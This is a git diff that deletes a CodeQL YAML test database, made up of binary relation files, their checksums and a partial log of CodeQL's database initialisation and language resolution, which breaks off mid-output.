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 z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009F3 HW`Vx|E&&!+ diff --git a/ql/src/test-db/db-yaml/default/yaml.rel b/ql/src/test-db/db-yaml/default/yaml.rel deleted file mode 100644 index 529b4a834dece968ff95f48071bca09a7a2963c7..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7992 zcmYkA3Cvw(5r+SBz@S#PvI+9H_oskj*-F{5wWZ+JvI!I@7E&l;WeG?Tu?UC?DuNUd z0og)ukI{g;F$M@B7>ru*~XGme|TCHhL#e%sW1>u!y1k1EC$^X)Z52k~7tLdDG)q2c)g&-UFHokEonYTSHl z&#L~Y;W-ycW&Z4qPwGt`5U3)ljxqP zpEqCr&S4*PFI3*f72j(YbZ;FbaqBo6Kcno`@SKV7EEMy@bHwxhsP)ay`Z|LHP$hBe zPoW11BKz0+zQ<1JJTyGD@|=y%N0r2_<9rsN%DjfBGd{GSLwx6N?+3dw?As92=gl(OZKzJYB10sC`eW zar>T#o?QLJbMBT0Z~D3>rv}HSuls)mYW-!kuk}wrPeYZ&eXj%2m8khEYJKzF|7V~| z;^w>m&lE&fHhkRws|q^ghmU*YEY$kuXJ5Go&PJ8Qt$#3jt{`$&Q~!1N=NELSpY@#t zy8yMH^N0T4z3b zb#QFv=^U;JPQLRr-}7=E8lKjd=Mm^yR7pHMKQX`)*EKvBfPFGJw&nS$;0@1(U^fTH zwmd%_yy3YB?6%<8jZyiG&^u81%jbEl{Fk72qDtcCJDzIV?(sQf*r)|dZW^j=g++`gXE zuL~mgkRSe@({C1Z$WQ&Fz`h;4*0;{l=y!u-!~YnbzZabR@b^CXesFB&KgsibsQu*Q z{I^1vqW7b|mvP1SIv#yM2T5E$?&k*uk^8BW_wufNsGviB-phOV;oziaU5*2L47Km0 zHEv(;;U8B&@!Z2d3EuQQ0PJVMvFYnQ{5Wd;$7)~epMm}YRTB5Tyz`$#&40YsH{bRB zC8{Kz_5Jk#PdwT1aeaRq92-8)|M%55-#Iw{mFQEbeT^&jJq7)P4w880|MUP)Jk|7_ z5BBHa*z}#j^IwD4zSdcU{yjK$BUF5Zu0!QxefO1omZSefmBh`r@4p3+bq$}l;s2+g zLw@*pPM-4r8AC{{I>6A!JEE&leewO{AWK! zyC42`#T&;9Prj$R?SnUc`S(TV9z{w$`_}W-O$v(FzSgI9=N>{5FZH*;9|?-r`sTy2 zo5CX9$Ums>xh0RYu=MNlJKz1kHU7?6q{MwNe>(ndI#}O3`+;-a%@!1=uWM%Ceerk4 zB8ite%%Ec}OaAPJC+E7`tE7+PC7*k{n-jd|%ZHhDd`2ntvR=-aH5hR6vrl#e_ijQ; ze)u!v?jS(tuxI7(9QMKYx0ml_T=Bhj!9S#U<9Ol8nsoDmH#}#8zdkrNJV)RQ@vVPw z$`qCfqPcN6I*z)CY@&$Nxal?K8u4lJa+~6w+mA8!_#wm zRPf5v`OgPGCO9_pbPmS`C*S>GKEIc`rP%PazVA!V?gT87_?YKO!5f|n$U8YWw&l4z zc*Aoc`P?Z=so(Nk5xn8Kh`iH-W4&|aKLYo=O8!g9_xoD@tMK2BMG`Oh&gUJ$8~$M3 zJA-4xpL@7FJ9xvNwe8Lgjtzg-wmUC)!=JV7R)fpaeQUlvIYZrrSS0cBoG%LA@Z5vE zi-Tjs)BUg}c*E2C^L@dw;px47S@4FZ_vcmM^1O107oI2Lf4Jt?`1n5jXz+$7XS(}X zaBO&bFI|go{i`ZZ=fE0vAFuf}Ugp5>jc#qtzqZyl-+Sr$nqT83-+SqX;0+(|r5l4| z!)Frwror#lRzBV{E5UEZ%G0=F-&62!Dc(3<`a1txgExKMZ?^}>rtb{!JA>E0?&n3| zcLm30y++`7V``}RA*8=mgl`@!vd-w-c- z_rrgn=GS=XI}QB7;7#96!5<2aweRNWX5bHFt?%#o^*lTO?eKqqMG`Od{oa2>P`uVR zpYQ1Ihh}exm;5d9e*{Rs?va}BKHM7rQL}5@2j@H;|ED@w-z)3l`TDt_ICZj5_QikP z><#f!XM6l71jQSkbMc=n>En3G_k8^-c+HoO=j%7YvCd80IsYy=`OZz;@BOEOW5a(E z{Ezs~;fc!MIqZY~G*+I*73aAN{-26Bj+gqLufGIuc+Ld>TX1Z6j==wcZ~dn$PwVfD zzYdEeUg}Tb|0{T{KMQ{+@c)|3fAYi@p0jy;hG!)4@qC^Q-tgR&yyt>r!_#}_f59tH z=jnNOt&vhc^K=d`1}EPf^ZDNItr?y^`@Tnj`&lIM@a$g_yy3ZkyiJ1pA=LWt>|YkV z;kgi;J)xBP4bPslH{cD=MdW$@kdnVK57r;yb7th<_vGh$e+fQkLrJ{kGoPNbG~f;Y z!@)U|1J2*@=RWK?O9S5U=RWK?0|UMxIcT&e3>U_t%y8N1n2Hh z63>0u?;pJ3$@hMLU~oT#+Lu}O2V-5Yxs|8&PryF}izHt1snO2^G~eIh?qT!c*t3>O z;w7Io=@$SZef$6CxtIDwgBwKUa}bY*VXbfedY-L+K0bRwNxbC4y?i$v$f|!DepOm**PrbFoO` zmx1TK%(w5Q;Fn{O#K-S-MewFCwfheS_d}?2v+tF`>wAf_hW*tQ=ZuW=*~|Sk z`0{E09X%KS+L~YErTz}!*9C9*cz&-Bjt!rqc)THa!-uod-xwU5xg7(3Q*iR#pYr#f zxg|I@-!GHkx8l>UzlQwhdEN?rKmKi4-^;k-oG-_}U1vkQ)Mw56I}6O`>U+6P+!_5{ Q!LfNS=X`hY=Dm*lKmT;wC;$Ke diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum deleted file mode 100644 index a3783e268b8d3866cb97455ff14cd484ab0b8d47..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel deleted file mode 100644 index 014f03a3a638a16c87b040ee21668cc0ff098479..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum deleted file mode 100644 index bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index e045b05d47e291009889305846e60f9c1b64b7a1..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. -[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - 